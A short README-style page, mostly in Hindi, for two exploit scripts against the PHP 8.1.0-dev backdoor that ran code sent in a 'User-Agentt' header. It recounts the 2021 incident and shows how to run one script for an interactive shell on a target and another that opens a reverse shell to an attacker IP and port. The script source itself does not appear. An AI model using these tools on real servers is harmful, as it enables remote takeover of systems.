
PHP 8.1.0-dev Backdoor System Shell Script
PHP 8.1.0-dev बैकडोर सिस्टम शेल स्क्रिप्ट

PHP संस्करण 8.1.0-dev 28 मार्च 2021 को एक बैकडोर के साथ जारी किया गया था, लेकिन बैकडोर जल्दी ही खोज लिया गया और हटा दिया गया। यदि PHP का यह संस्करण किसी सर्वर पर चलता है, तो एक हमलावर User-Agentt हेडर भेजकर मनमाना कोड निष्पादित कर सकता है।
समस्या का पता चलने के बाद मूल कोड को बहाल कर दिया गया था, लेकिन फिर दूसरी बार छेड़छाड़ की गई। इस उल्लंघन ने उन सभी वेबसाइटों में एक बैकडोर बना दिया होता जो PHP के समझौता किए गए संस्करण को चला रही थीं, जिससे हैकर्स साइट पर रिमोट कोड निष्पादन कर सकते थे।
पूरा लेख पढ़ें: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
यह छोटी एक्सप्लॉइट स्क्रिप्ट backdoor_php_8.1.0-dev.py बैकडोर का उपयोग करके होस्ट पर एक स्यूडो सिस्टम शेल प्रदान करती है। इसे Exploit DB पर खोजें।
उपयोग:
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
Enter the host url:
http://a.b.c.d
Interactive shell is opened on http://a.b.c.d
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
यह छोटी एक्सप्लॉइट स्क्रिप्ट revshell_php_8.1.0-dev.py लक्ष्य पर एक रिवर्स शेल प्रदान करती है।
उपयोग:
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

जिज्ञासु बनें, सीखना ही जीवन है! 😃